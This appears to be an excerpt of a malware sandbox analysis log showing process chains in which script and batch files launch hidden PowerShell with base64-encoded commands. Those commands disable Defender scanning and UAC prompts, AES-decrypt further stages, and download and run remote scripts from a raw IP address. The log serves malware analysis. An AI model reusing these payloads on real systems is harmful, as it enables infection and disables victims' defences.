bFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_87.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_412.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'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'+[cHAr]0X22+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_87.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_412.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04F1B0F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04F1B0D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728A6E0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728AD48
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07289458
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728B3B0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728A078
